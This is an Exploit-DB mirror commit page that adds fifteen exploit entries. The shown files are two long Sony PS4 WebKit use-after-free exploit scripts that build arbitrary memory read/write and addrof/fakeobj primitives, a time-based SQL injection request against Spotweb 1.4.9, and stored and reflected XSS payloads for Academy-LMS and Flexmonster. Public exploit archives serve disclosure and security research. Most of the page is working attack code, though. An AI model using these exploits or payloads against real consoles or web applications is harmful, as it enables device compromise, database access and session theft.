bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2020-12-22

Browse source 
15 changes to exploits/shellcodes

Queue Management System 4.0.0 - _Add User_ Stored XSS
Spotweb 1.4.9 - 'search' SQL Injection
Academy-LMS 4.3 - Stored XSS
Spiceworks 7.5 - HTTP Header Injection

Wordpress Plugin Contact Form 7 5.3.1 - Unrestricted File Upload
SCO Openserver 5.0.7 - 'section' Reflected XSS
SCO Openserver 5.0.7 - 'outputform' Command Injection
Flexmonster Pivot Table & Charts 2.7.17 - 'Remote Report' Reflected XSS
Flexmonster Pivot Table & Charts 2.7.17 - 'To OLAP' Reflected XSS
Flexmonster Pivot Table & Charts 2.7.17 - 'To remote CSV' Reflected XSS
Flexmonster Pivot Table & Charts 2.7.17 - 'Remote JSON' Reflected XSS
Point of Sale System 1.0 - Multiple Stored XSS
Online Marriage Registration System 1.0 - 'searchdata' SQL Injection
Sony Playstation 4 (PS4) < 6.72 - 'ValidationMessage::buildBubbleTree()' Use-After-Free WebKit Code Execution (PoC)
Sony Playstation 4 (PS4) < 7.02 - 'ValidationMessage::buildBubbleTree()' Use-After-Free WebKit Code Execution (PoC)
This commit is contained in:
Offensive Security 2020-12-22 05:01:58 +00:00
parent cb83a6e2dd
commit cd30696d15
16 changed files with 1740 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

422
exploits/hardware/webapps/49308.js Normal file
View file

@ -0,0 +1,422 @@
const OFFSET_ELEMENT_REFCOUNT = 0x10;
const OFFSET_JSAB_VIEW_VECTOR = 0x10;
const OFFSET_JSAB_VIEW_LENGTH = 0x18;
const OFFSET_LENGTH_STRINGIMPL = 0x04;
const OFFSET_HTMLELEMENT_REFCOUNT = 0x14;
const LENGTH_ARRAYBUFFER = 0x8;
const LENGTH_STRINGIMPL = 0x14;
const LENGTH_JSVIEW = 0x20;
const LENGTH_VALIDATION_MESSAGE = 0x30;
const LENGTH_TIMER = 0x48;
const LENGTH_HTMLTEXTAREA = 0xd8;
const SPRAY_ELEM_SIZE = 0x6000;
const SPRAY_STRINGIMPL = 0x1000;
const NB_FRAMES = 0xfa0;
const NB_REUSE = 0x8000;
var g_arr_ab_1 = [];
var g_arr_ab_2 = [];
var g_arr_ab_3 = [];
var g_frames = [];
var g_relative_read = null;
var g_relative_rw = null;
var g_ab_slave = null;
var g_ab_index = null;
var g_timer_leak = null;
var g_jsview_leak = null;
var g_message_heading_leak = null;
var g_message_body_leak = null;
var g_obj_str = {};
var g_rows1 = '1px,'.repeat(LENGTH_VALIDATION_MESSAGE / 8 - 2) + "1px";
var g_rows2 = '2px,'.repeat(LENGTH_VALIDATION_MESSAGE / 8 - 2) + "2px";
var g_round = 1;
var g_input = null;
var guess_htmltextarea_addr = new Int64("0x2070a00d8");
/* Executed after deleteBubbleTree */
function setupRW() {
/* Now the m_length of the JSArrayBufferView should be 0xffffff01 */
for (let i = 0; i < g_arr_ab_3.length; i++) {
if (g_arr_ab_3[i].length > 0xff) {
g_relative_rw = g_arr_ab_3[i];
debug_log("[+] Succesfully got a relative R/W");
break;
}
}
if (g_relative_rw === null)
die("[!] Failed to setup a relative R/W primitive");
debug_log("[+] Setting up arbitrary R/W");
/* Retrieving the ArrayBuffer address using the relative read */
let diff = g_jsview_leak.sub(g_timer_leak).low32() - LENGTH_STRINGIMPL + 1;
let ab_addr = new Int64(str2array(g_relative_read, 8, diff + OFFSET_JSAB_VIEW_VECTOR));
/* Does the next JSObject is a JSView? Otherwise we target the previous JSObject */
let ab_index = g_jsview_leak.sub(ab_addr).low32();
if (g_relative_rw[ab_index + LENGTH_JSVIEW + OFFSET_JSAB_VIEW_LENGTH] === LENGTH_ARRAYBUFFER)
g_ab_index = ab_index + LENGTH_JSVIEW;
else
g_ab_index = ab_index - LENGTH_JSVIEW;
/* Overding the length of one JSArrayBufferView with a known value */
g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_LENGTH] = 0x41;
/* Looking for the slave JSArrayBufferView */
for (let i = 0; i < g_arr_ab_3.length; i++) {
if (g_arr_ab_3[i].length === 0x41) {
g_ab_slave = g_arr_ab_3[i];
g_arr_ab_3 = null;
break;
}
}
if (g_ab_slave === null)
die("[!] Didn't found the slave JSArrayBufferView");
/* Extending the JSArrayBufferView length */
g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_LENGTH] = 0xff;
g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_LENGTH + 1] = 0xff;
g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_LENGTH + 2] = 0xff;
g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_LENGTH + 3] = 0xff;
debug_log("[+] Testing arbitrary R/W");
let saved_vtable = read64(guess_htmltextarea_addr);
write64(guess_htmltextarea_addr, new Int64("0x4141414141414141"));
if (!read64(guess_htmltextarea_addr).equals("0x4141414141414141"))
die("[!] Failed to setup arbitrary R/W primitive");
debug_log("[+] Succesfully got arbitrary R/W!");
/* Restore the overidden vtable pointer */
write64(guess_htmltextarea_addr, saved_vtable);
/* Cleanup memory */
cleanup();
/* Getting code execution */
/* ... */
}
function read(addr, length) {
for (let i = 0; i < 8; i++)
g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_VECTOR + i] = addr.byteAt(i);
let arr = [];
for (let i = 0; i < length; i++)
arr.push(g_ab_slave[i]);
return arr;
}
function read64(addr) {
return new Int64(read(addr, 8));
}
function write(addr, data) {
for (let i = 0; i < 8; i++)
g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_VECTOR + i] = addr.byteAt(i);
for (let i = 0; i < data.length; i++)
g_ab_slave[i] = data[i];
}
function write64(addr, data) {
write(addr, data.bytes());
}
function cleanup() {
select1.remove();
select1 = null;
input1.remove();
input1 = null;
input2.remove();
input2 = null;
input3.remove();
input3 = null;
div1.remove();
div1 = null;
g_input = null;
g_rows1 = null;
g_rows2 = null;
g_frames = null;
}
/*
* Executed after buildBubbleTree
* and before deleteBubbleTree
*/
function confuseTargetObjRound2() {
if (findTargetObj() === false)
die("[!] Failed to reuse target obj.");
g_fake_validation_message[4] = g_jsview_leak.add(OFFSET_JSAB_VIEW_LENGTH + 5 - OFFSET_HTMLELEMENT_REFCOUNT).asDouble();
setTimeout(setupRW, 6000);
}
/* Executed after deleteBubbleTree */
function leakJSC() {
debug_log("[+] Looking for the smashed StringImpl...");
var arr_str = Object.getOwnPropertyNames(g_obj_str);
/* Looking for the smashed string */
for (let i = arr_str.length - 1; i > 0; i--) {
if (arr_str[i].length > 0xff) {
debug_log("[+] StringImpl corrupted successfully");
g_relative_read = arr_str[i];
g_obj_str = null;
break;
}
}
if (g_relative_read === null)
die("[!] Failed to setup a relative read primitive");
debug_log("[+] Got a relative read");
let ab = new ArrayBuffer(LENGTH_ARRAYBUFFER);
/* Spraying JSView */
let tmp = [];
for (let i = 0; i < 0x10000; i++) {
/* The last allocated are more likely to be allocated after our relative read */
if (i >= 0xfc00)
g_arr_ab_3.push(new Uint8Array(ab));
else
tmp.push(new Uint8Array(ab));
}
tmp = null;
/*
* Force JSC ref on FastMalloc Heap
* https://github.com/Cryptogenic/PS4-5.05-Kernel-Exploit/blob/master/expl.js#L151
*/
var props = [];
for (var i = 0; i < 0x400; i++) {
props.push({ value: 0x42424242 });
props.push({ value: g_arr_ab_3[i] });
}
/*
* /!\
* This part must avoid as much as possible fastMalloc allocation
* to avoid re-using the targeted object
* /!\
*/
/* Use relative read to find our JSC obj */
/* We want a JSView that is allocated after our relative read */
while (g_jsview_leak === null) {
Object.defineProperties({}, props);
for (let i = 0; i < 0x800000; i++) {
var v = undefined;
if (g_relative_read.charCodeAt(i) === 0x42 &&
g_relative_read.charCodeAt(i + 0x01) === 0x42 &&
g_relative_read.charCodeAt(i + 0x02) === 0x42 &&
g_relative_read.charCodeAt(i + 0x03) === 0x42) {
if (g_relative_read.charCodeAt(i + 0x08) === 0x00 &&
g_relative_read.charCodeAt(i + 0x0f) === 0x00 &&
g_relative_read.charCodeAt(i + 0x10) === 0x00 &&
g_relative_read.charCodeAt(i + 0x17) === 0x00 &&
g_relative_read.charCodeAt(i + 0x18) === 0x0e &&
g_relative_read.charCodeAt(i + 0x1f) === 0x00 &&
g_relative_read.charCodeAt(i + 0x28) === 0x00 &&
g_relative_read.charCodeAt(i + 0x2f) === 0x00 &&
g_relative_read.charCodeAt(i + 0x30) === 0x00 &&
g_relative_read.charCodeAt(i + 0x37) === 0x00 &&
g_relative_read.charCodeAt(i + 0x38) === 0x0e &&
g_relative_read.charCodeAt(i + 0x3f) === 0x00)
v = new Int64(str2array(g_relative_read, 8, i + 0x20));
else if (g_relative_read.charCodeAt(i + 0x10) === 0x42 &&
g_relative_read.charCodeAt(i + 0x11) === 0x42 &&
g_relative_read.charCodeAt(i + 0x12) === 0x42 &&
g_relative_read.charCodeAt(i + 0x13) === 0x42)
v = new Int64(str2array(g_relative_read, 8, i + 8));
}
if (v !== undefined && v.greater(g_timer_leak) && v.sub(g_timer_leak).hi32() === 0x0) {
g_jsview_leak = v;
props = null;
break;
}
}
}
/*
* /!\
* Critical part ended-up here
* /!\
*/
debug_log("[+] JSArrayBufferView: " + g_jsview_leak);
/* Run the exploit again */
prepareUAF();
}
/*
* Executed after buildBubbleTree
* and before deleteBubbleTree
*/
function confuseTargetObjRound1() {
/* Force allocation of StringImpl obj. beyond Timer address */
sprayStringImpl(SPRAY_STRINGIMPL, SPRAY_STRINGIMPL * 2);
/* Checking for leaked data */
if (findTargetObj() === false)
die("[!] Failed to reuse target obj.");
dumpTargetObj();
g_fake_validation_message[4] = g_timer_leak.add(LENGTH_TIMER * 8 + OFFSET_LENGTH_STRINGIMPL + 1 - OFFSET_ELEMENT_REFCOUNT).asDouble();
/*
* The timeout must be > 5s because deleteBubbleTree is scheduled to run in
* the next 5s
*/
setTimeout(leakJSC, 6000);
}
function handle2() {
/* focus elsewhere */
input2.focus();
}
function reuseTargetObj() {
/* Delete ValidationMessage instance */
document.body.appendChild(g_input);
/*
* Free ValidationMessage neighboors.
* SmallLine is freed -> SmallPage is cached
*/
for (let i = NB_FRAMES / 2 - 0x10; i < NB_FRAMES / 2 + 0x10; i++)
g_frames[i].setAttribute("rows", ',');
/* Get back target object */
for (let i = 0; i < NB_REUSE; i++) {
let ab = new ArrayBuffer(LENGTH_VALIDATION_MESSAGE);
let view = new Float64Array(ab);
view[0] = guess_htmltextarea_addr.asDouble(); // m_element
view[3] = guess_htmltextarea_addr.asDouble(); // m_bubble
g_arr_ab_1.push(view);
}
if (g_round == 1) {
/*
* Spray a couple of StringImpl obj. prior to Timer allocation
* This will force Timer allocation on same SmallPage as our Strings
*/
sprayStringImpl(0, SPRAY_STRINGIMPL);
g_frames = [];
g_round += 1;
g_input = input3;
setTimeout(confuseTargetObjRound1, 10);
} else {
setTimeout(confuseTargetObjRound2, 10);
}
}
function dumpTargetObj() {
debug_log("[+] m_timer: " + g_timer_leak);
debug_log("[+] m_messageHeading: " + g_message_heading_leak);
debug_log("[+] m_messageBody: " + g_message_body_leak);
}
function findTargetObj() {
for (let i = 0; i < g_arr_ab_1.length; i++) {
if (!Int64.fromDouble(g_arr_ab_1[i][2]).equals(Int64.Zero)) {
debug_log("[+] Found fake ValidationMessage");
if (g_round === 2) {
g_timer_leak = Int64.fromDouble(g_arr_ab_1[i][2]);
g_message_heading_leak = Int64.fromDouble(g_arr_ab_1[i][4]);
g_message_body_leak = Int64.fromDouble(g_arr_ab_1[i][5]);
g_round++;
}
g_fake_validation_message = g_arr_ab_1[i];
g_arr_ab_1 = [];
return true;
}
}
return false;
}
function prepareUAF() {
g_input.setCustomValidity("ps4");
for (let i = 0; i < NB_FRAMES; i++) {
var element = document.createElement("frameset");
g_frames.push(element);
}
g_input.reportValidity();
var div = document.createElement("div");
document.body.appendChild(div);
div.appendChild(g_input);
/* First half spray */
for (let i = 0; i < NB_FRAMES / 2; i++)
g_frames[i].setAttribute("rows", g_rows1);
/* Instantiate target obj */
g_input.reportValidity();
/* ... and the second half */
for (let i = NB_FRAMES / 2; i < NB_FRAMES; i++)
g_frames[i].setAttribute("rows", g_rows2);
g_input.setAttribute("onfocus", "reuseTargetObj()");
g_input.autofocus = true;
}
/* HTMLElement spray */
function sprayHTMLTextArea() {
debug_log("[+] Spraying HTMLTextareaElement ...");
let textarea_div_elem = document.createElement("div");
document.body.appendChild(textarea_div_elem);
textarea_div_elem.id = "div1";
var element = document.createElement("textarea");
/* Add a style to avoid textarea display */
element.style.cssText = 'display:block-inline;height:1px;width:1px;visibility:hidden;';
/*
* This spray is not perfect, "element.cloneNode" will trigger a fastMalloc
* allocation of the node attributes and an IsoHeap allocation of the
* Element. The virtual page layout will look something like that:
* [IsoHeap] [fastMalloc] [IsoHeap] [fastMalloc] [IsoHeap] [...]
*/
for (let i = 0; i < SPRAY_ELEM_SIZE; i++)
textarea_div_elem.appendChild(element.cloneNode());
}
/* StringImpl Spray */
function sprayStringImpl(start, end) {
for (let i = start; i < end; i++) {
let s = new String("A".repeat(LENGTH_TIMER - LENGTH_STRINGIMPL - 5) + i.toString().padStart(5, "0"));
g_obj_str[s] = 0x1337;
}
}
function go() {
/* Init spray */
sprayHTMLTextArea();
g_input = input1;
/* Shape heap layout for obj. reuse */
prepareUAF();
}

513
exploits/hardware/webapps/49309.js Normal file
View file

@ -0,0 +1,513 @@
const OFFSET_ELEMENT_REFCOUNT = 0x10;
const OFFSET_JSAB_VIEW_VECTOR = 0x10;
const OFFSET_JSAB_VIEW_LENGTH = 0x18;
const OFFSET_LENGTH_STRINGIMPL = 0x04;
const OFFSET_HTMLELEMENT_REFCOUNT = 0x14;
const LENGTH_ARRAYBUFFER = 0x8;
const LENGTH_STRINGIMPL = 0x14;
const LENGTH_JSVIEW = 0x20;
const LENGTH_VALIDATION_MESSAGE = 0x30;
const LENGTH_TIMER = 0x48;
const LENGTH_HTMLTEXTAREA = 0xd8;
const SPRAY_ELEM_SIZE = 0x6000;
const SPRAY_STRINGIMPL = 0x1000;
const NB_FRAMES = 0xfa0;
const NB_REUSE = 0x8000;
var g_arr_ab_1 = [];
var g_arr_ab_2 = [];
var g_arr_ab_3 = [];
var g_frames = [];
var g_relative_read = null;
var g_relative_rw = null;
var g_ab_slave = null;
var g_ab_index = null;
var g_timer_leak = null;
var g_jsview_leak = null;
var g_jsview_butterfly = null;
var g_message_heading_leak = null;
var g_message_body_leak = null;
var g_obj_str = {};
var g_rows1 = '1px,'.repeat(LENGTH_VALIDATION_MESSAGE / 8 - 2) + "1px";
var g_rows2 = '2px,'.repeat(LENGTH_VALIDATION_MESSAGE / 8 - 2) + "2px";
var g_round = 1;
var g_input = null;
var guess_htmltextarea_addr = new Int64("0x2031b00d8");
var master_b = new Uint32Array(2);
var slave_b = new Uint32Array(2);
var slave_addr;
var slave_buf_addr;
var master_addr;
/* Executed after deleteBubbleTree */
function setupRW() {
/* Now the m_length of the JSArrayBufferView should be 0xffffff01 */
for (let i = 0; i < g_arr_ab_3.length; i++) {
if (g_arr_ab_3[i].length > 0xff) {
g_relative_rw = g_arr_ab_3[i];
debug_log("[+] Succesfully got a relative R/W");
break;
}
}
if (g_relative_rw === null)
die("[!] Failed to setup a relative R/W primitive");
debug_log("[+] Setting up arbitrary R/W");
/* Retrieving the ArrayBuffer address using the relative read */
let diff = g_jsview_leak.sub(g_timer_leak).low32() - LENGTH_STRINGIMPL + 1;
let ab_addr = new Int64(str2array(g_relative_read, 8, diff + OFFSET_JSAB_VIEW_VECTOR));
/* Does the next JSObject is a JSView? Otherwise we target the previous JSObject */
let ab_index = g_jsview_leak.sub(ab_addr).low32();
if (g_relative_rw[ab_index + LENGTH_JSVIEW + OFFSET_JSAB_VIEW_LENGTH] === LENGTH_ARRAYBUFFER)
g_ab_index = ab_index + LENGTH_JSVIEW;
else
g_ab_index = ab_index - LENGTH_JSVIEW;
/* Overding the length of one JSArrayBufferView with a known value */
g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_LENGTH] = 0x41;
/* Looking for the slave JSArrayBufferView */
for (let i = 0; i < g_arr_ab_3.length; i++) {
if (g_arr_ab_3[i].length === 0x41) {
g_ab_slave = g_arr_ab_3[i];
g_arr_ab_3 = null;
break;
}
}
if (g_ab_slave === null)
die("[!] Didn't found the slave JSArrayBufferView");
/* Extending the JSArrayBufferView length */
g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_LENGTH] = 0xff;
g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_LENGTH + 1] = 0xff;
g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_LENGTH + 2] = 0xff;
g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_LENGTH + 3] = 0xff;
debug_log("[+] Testing arbitrary R/W");
let saved_vtable = read64(guess_htmltextarea_addr);
write64(guess_htmltextarea_addr, new Int64("0x4141414141414141"));
if (!read64(guess_htmltextarea_addr).equals("0x4141414141414141"))
die("[!] Failed to setup arbitrary R/W primitive");
debug_log("[+] Succesfully got arbitrary R/W!");
/* Restore the overidden vtable pointer */
write64(guess_htmltextarea_addr, saved_vtable);
/* Cleanup memory */
cleanup();
/* Set up addrof/fakeobj primitives */
g_ab_slave.leakme = 0x1337;
var bf = 0;
for(var i = 15; i >= 8; i--)
bf = 256 * bf + g_relative_rw[g_ab_index + i];
g_jsview_butterfly = new Int64(bf);
if(!read64(g_jsview_butterfly.sub(16)).equals(new Int64("0xffff000000001337")))
die("[!] Failed to setup addrof/fakeobj primitives");
debug_log("[+] Succesfully got addrof/fakeobj");
/* Getting code execution */
/* ... */
var leak_slave = addrof(slave_b);
var slave_addr = read64(leak_slave.add(0x10));
og_slave_addr = new int64(slave_addr.low32(), slave_addr.hi32());
var leak_master = addrof(master_b);
write64(leak_master.add(0x10), leak_slave.add(0x10));
var prim = {
write8: function(addr, val) {
master_b[0] = addr.low;
master_b[1] = addr.hi;
if(val instanceof int64) {
slave_b[0] = val.low;
slave_b[1] = val.hi;
}
else {
slave_b[0] = val;
slave_b[1] = 0;
}
master_b[0] = og_slave_addr.low;
master_b[1] = og_slave_addr.hi;
},
write4: function(addr, val) {
master_b[0] = addr.low;
master_b[1] = addr.hi;
slave_b[0] = val;
master_b[0] = og_slave_addr.low;
master_b[1] = og_slave_addr.hi;
},
read8: function(addr) {
master_b[0] = addr.low;
master_b[1] = addr.hi;
var r = new int64(slave_b[0], slave_b[1]);
master_b[0] = og_slave_addr.low;
master_b[1] = og_slave_addr.hi;
return r;
},
read4: function(addr) {
master_b[0] = addr.low;
master_b[1] = addr.hi;
var r = slave_b[0];
master_b[0] = og_slave_addr.low;
master_b[1] = og_slave_addr.hi;
return r;
},
leakval: function(val) {
g_ab_slave.leakme = val;
master_b[0] = g_jsview_butterfly.low32() - 0x10;
master_b[1] = g_jsview_butterfly.hi32();
var r = new int64(slave_b[0], slave_b[1]);
master_b[0] = og_slave_addr.low;
master_b[1] = og_slave_addr.hi;
return r;
},
};
window.prim = prim;
setTimeout(stage2, 1000);
}
function read(addr, length) {
for (let i = 0; i < 8; i++)
g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_VECTOR + i] = addr.byteAt(i);
let arr = [];
for (let i = 0; i < length; i++)
arr.push(g_ab_slave[i]);
return arr;
}
function read64(addr) {
return new Int64(read(addr, 8));
}
function write(addr, data) {
for (let i = 0; i < 8; i++)
g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_VECTOR + i] = addr.byteAt(i);
for (let i = 0; i < data.length; i++)
g_ab_slave[i] = data[i];
}
function write64(addr, data) {
write(addr, data.bytes());
}
function addrof(obj) {
g_ab_slave.leakme = obj;
return read64(g_jsview_butterfly.sub(16));
}
function fakeobj(addr) {
write64(g_jsview_butterfly.sub(16), addr);
return g_ab_slave.leakme;
}
function cleanup() {
select1.remove();
select1 = null;
input1.remove();
input1 = null;
input2.remove();
input2 = null;
input3.remove();
input3 = null;
div1.remove();
div1 = null;
g_input = null;
g_rows1 = null;
g_rows2 = null;
g_frames = null;
}
/*
* Executed after buildBubbleTree
* and before deleteBubbleTree
*/
function confuseTargetObjRound2() {
if (findTargetObj() === false)
die("[!] Failed to reuse target obj.");
g_fake_validation_message[4] = g_jsview_leak.add(OFFSET_JSAB_VIEW_LENGTH + 5 - OFFSET_HTMLELEMENT_REFCOUNT).asDouble();
setTimeout(setupRW, 6000);
}
/* Executed after deleteBubbleTree */
function leakJSC() {
debug_log("[+] Looking for the smashed StringImpl...");
var arr_str = Object.getOwnPropertyNames(g_obj_str);
/* Looking for the smashed string */
for (let i = arr_str.length - 1; i > 0; i--) {
if (arr_str[i].length > 0xff) {
debug_log("[+] StringImpl corrupted successfully");
g_relative_read = arr_str[i];
g_obj_str = null;
break;
}
}
if (g_relative_read === null)
die("[!] Failed to setup a relative read primitive");
debug_log("[+] Got a relative read");
var tmp_spray = {};
for(var i = 0; i < 100000; i++)
tmp_spray['Z'.repeat(8 * 2 * 8 - 5 - LENGTH_STRINGIMPL) + (''+i).padStart(5, '0')] = 0x1337;
let ab = new ArrayBuffer(LENGTH_ARRAYBUFFER);
/* Spraying JSView */
let tmp = [];
for (let i = 0; i < 0x10000; i++) {
/* The last allocated are more likely to be allocated after our relative read */
if (i >= 0xfc00)
g_arr_ab_3.push(new Uint8Array(ab));
else
tmp.push(new Uint8Array(ab));
}
tmp = null;
/*
* Force JSC ref on FastMalloc Heap
* https://github.com/Cryptogenic/PS4-5.05-Kernel-Exploit/blob/master/expl.js#L151
*/
var props = [];
for (var i = 0; i < 0x400; i++) {
props.push({ value: 0x42424242 });
props.push({ value: g_arr_ab_3[i] });
}
/*
* /!\
* This part must avoid as much as possible fastMalloc allocation
* to avoid re-using the targeted object
* /!\
*/
/* Use relative read to find our JSC obj */
/* We want a JSView that is allocated after our relative read */
while (g_jsview_leak === null) {
Object.defineProperties({}, props);
for (let i = 0; i < 0x800000; i++) {
var v = undefined;
if (g_relative_read.charCodeAt(i) === 0x42 &&
g_relative_read.charCodeAt(i + 0x01) === 0x42 &&
g_relative_read.charCodeAt(i + 0x02) === 0x42 &&
g_relative_read.charCodeAt(i + 0x03) === 0x42) {
if (g_relative_read.charCodeAt(i + 0x08) === 0x00 &&
g_relative_read.charCodeAt(i + 0x0f) === 0x00 &&
g_relative_read.charCodeAt(i + 0x10) === 0x00 &&
g_relative_read.charCodeAt(i + 0x17) === 0x00 &&
g_relative_read.charCodeAt(i + 0x18) === 0x0e &&
g_relative_read.charCodeAt(i + 0x1f) === 0x00 &&
g_relative_read.charCodeAt(i + 0x28) === 0x00 &&
g_relative_read.charCodeAt(i + 0x2f) === 0x00 &&
g_relative_read.charCodeAt(i + 0x30) === 0x00 &&
g_relative_read.charCodeAt(i + 0x37) === 0x00 &&
g_relative_read.charCodeAt(i + 0x38) === 0x0e &&
g_relative_read.charCodeAt(i + 0x3f) === 0x00)
v = new Int64(str2array(g_relative_read, 8, i + 0x20));
else if (g_relative_read.charCodeAt(i + 0x10) === 0x42 &&
g_relative_read.charCodeAt(i + 0x11) === 0x42 &&
g_relative_read.charCodeAt(i + 0x12) === 0x42 &&
g_relative_read.charCodeAt(i + 0x13) === 0x42)
v = new Int64(str2array(g_relative_read, 8, i + 8));
}
if (v !== undefined && v.greater(g_timer_leak) && v.sub(g_timer_leak).hi32() === 0x0) {
g_jsview_leak = v;
props = null;
break;
}
}
}
/*
* /!\
* Critical part ended-up here
* /!\
*/
debug_log("[+] JSArrayBufferView: " + g_jsview_leak);
/* Run the exploit again */
prepareUAF();
}
/*
* Executed after buildBubbleTree
* and before deleteBubbleTree
*/
function confuseTargetObjRound1() {
/* Force allocation of StringImpl obj. beyond Timer address */
sprayStringImpl(SPRAY_STRINGIMPL, SPRAY_STRINGIMPL * 2);
/* Checking for leaked data */
if (findTargetObj() === false)
die("[!] Failed to reuse target obj.");
dumpTargetObj();
g_fake_validation_message[4] = g_timer_leak.add(LENGTH_TIMER * 8 + OFFSET_LENGTH_STRINGIMPL + 1 - OFFSET_ELEMENT_REFCOUNT).asDouble();
/*
* The timeout must be > 5s because deleteBubbleTree is scheduled to run in
* the next 5s
*/
setTimeout(leakJSC, 6000);
}
function handle2() {
/* focus elsewhere */
input2.focus();
}
function reuseTargetObj() {
/* Delete ValidationMessage instance */
document.body.appendChild(g_input);
/*
* Free ValidationMessage neighboors.
* SmallLine is freed -> SmallPage is cached
*/
for (let i = NB_FRAMES / 2 - 0x10; i < NB_FRAMES / 2 + 0x10; i++)
g_frames[i].setAttribute("rows", ',');
/* Get back target object */
for (let i = 0; i < NB_REUSE; i++) {
let ab = new ArrayBuffer(LENGTH_VALIDATION_MESSAGE);
let view = new Float64Array(ab);
view[0] = guess_htmltextarea_addr.asDouble(); // m_element
view[3] = guess_htmltextarea_addr.asDouble(); // m_bubble
g_arr_ab_1.push(view);
}
if (g_round == 1) {
/*
* Spray a couple of StringImpl obj. prior to Timer allocation
* This will force Timer allocation on same SmallPage as our Strings
*/
sprayStringImpl(0, SPRAY_STRINGIMPL);
g_frames = [];
g_round += 1;
g_input = input3;
setTimeout(confuseTargetObjRound1, 10);
} else {
setTimeout(confuseTargetObjRound2, 10);
}
}
function dumpTargetObj() {
debug_log("[+] m_timer: " + g_timer_leak);
debug_log("[+] m_messageHeading: " + g_message_heading_leak);
debug_log("[+] m_messageBody: " + g_message_body_leak);
}
function findTargetObj() {
for (let i = 0; i < g_arr_ab_1.length; i++) {
if (!Int64.fromDouble(g_arr_ab_1[i][2]).equals(Int64.Zero)) {
debug_log("[+] Found fake ValidationMessage");
if (g_round === 2) {
g_timer_leak = Int64.fromDouble(g_arr_ab_1[i][2]);
g_message_heading_leak = Int64.fromDouble(g_arr_ab_1[i][4]);
g_message_body_leak = Int64.fromDouble(g_arr_ab_1[i][5]);
g_round++;
}
g_fake_validation_message = g_arr_ab_1[i];
g_arr_ab_1 = [];
return true;
}
}
return false;
}
function prepareUAF() {
g_input.setCustomValidity("ps4");
for (let i = 0; i < NB_FRAMES; i++) {
var element = document.createElement("frameset");
g_frames.push(element);
}
g_input.reportValidity();
var div = document.createElement("div");
document.body.appendChild(div);
div.appendChild(g_input);
/* First half spray */
for (let i = 0; i < NB_FRAMES / 2; i++)
g_frames[i].setAttribute("rows", g_rows1);
/* Instantiate target obj */
g_input.reportValidity();
/* ... and the second half */
for (let i = NB_FRAMES / 2; i < NB_FRAMES; i++)
g_frames[i].setAttribute("rows", g_rows2);
g_input.setAttribute("onfocus", "reuseTargetObj()");
g_input.autofocus = true;
}
/* HTMLElement spray */
function sprayHTMLTextArea() {
debug_log("[+] Spraying HTMLTextareaElement ...");
let textarea_div_elem = document.createElement("div");
document.body.appendChild(textarea_div_elem);
textarea_div_elem.id = "div1";
var element = document.createElement("textarea");
/* Add a style to avoid textarea display */
element.style.cssText = 'display:block-inline;height:1px;width:1px;visibility:hidden;';
/*
* This spray is not perfect, "element.cloneNode" will trigger a fastMalloc
* allocation of the node attributes and an IsoHeap allocation of the
* Element. The virtual page layout will look something like that:
* [IsoHeap] [fastMalloc] [IsoHeap] [fastMalloc] [IsoHeap] [...]
*/
for (let i = 0; i < SPRAY_ELEM_SIZE; i++)
textarea_div_elem.appendChild(element.cloneNode());
}
/* StringImpl Spray */
function sprayStringImpl(start, end) {
for (let i = start; i < end; i++) {
let s = new String("A".repeat(LENGTH_TIMER - LENGTH_STRINGIMPL - 5) + i.toString().padStart(5, "0"));
g_obj_str[s] = 0x1337;
}
}
function go() {
/* Init spray */
sprayHTMLTextArea();
g_input = input1;
/* Shape heap layout for obj. reuse */
prepareUAF();
}

18
exploits/multiple/webapps/49297.txt Normal file
View file

@ -0,0 +1,18 @@
# Exploit Title: Spotweb 1.4.9 - 'search' SQL Injection
# Google Dork: N/A
# Date: 20 December 2020
# Exploit Author: BouSalman
# Vendor Homepage: https://github.com/spotweb/spotweb
# Software Link: N/A
# Version: 1.4.9
# Tested on: Ubuntu 18.04
# CVE: CVE-2020-35545
GET /?page=index&search[tree]=cat0_z0_c')+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))c)+AND+(' HTTP/1.1
Host: 192.168.99.151
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close

15
exploits/multiple/webapps/49298.txt Normal file
View file

@ -0,0 +1,15 @@
# Exploit Title: Academy-LMS 4.3 - Stored XSS
# Date: 19/12/2020
# Vendor page: https://academy-lms.com/
# Version: 4.3
# Tested on Win10 and Google Chrome
# Exploit Author: Vinicius Alves
# XSS Payload: "><h1>STORED XSS</h1> (Scripts tag blocked)
1) Access LMS and log in to admin panel
2) Access courses page
3) Open course manager and SEO menu
4) Paste the XSS Payload tag and Submit
5) Access the course page on frontend
6) Exploited!

15
exploits/multiple/webapps/49302.txt Normal file
View file

@ -0,0 +1,15 @@
# Exploit Title: Flexmonster Pivot Table & Charts 2.7.17 - 'Remote Report' Reflected XSS
# Date: 08/01/2020
# Exploit Author: Marco Nappi
# Vendor Homepage: https://www.flexmonster.com/
# Version:Flexmonster Pivot Table & Charts 2.7.17
# Tested on:Flexmonster Pivot Table & Charts 2.7.17
# CVE : CVE-2020-20140
Cross Site Scripting (XSS) vulnerability in Remote Report component under the Open menu in Flexmonster Pivot Table & Charts 2.7.17
Reflected XSS:
The Reflected XSS is a result of insufficient input sanitization of the 'path' parameter when fetching the file specifications (file_specs.php). Below I have provided an example URL. When using this URL the user navigates to an non-existing file (the XSS payload). This results in the execution of the payload.
payload:
<svg onload=alert("OpenRemoteReport")><!--

15
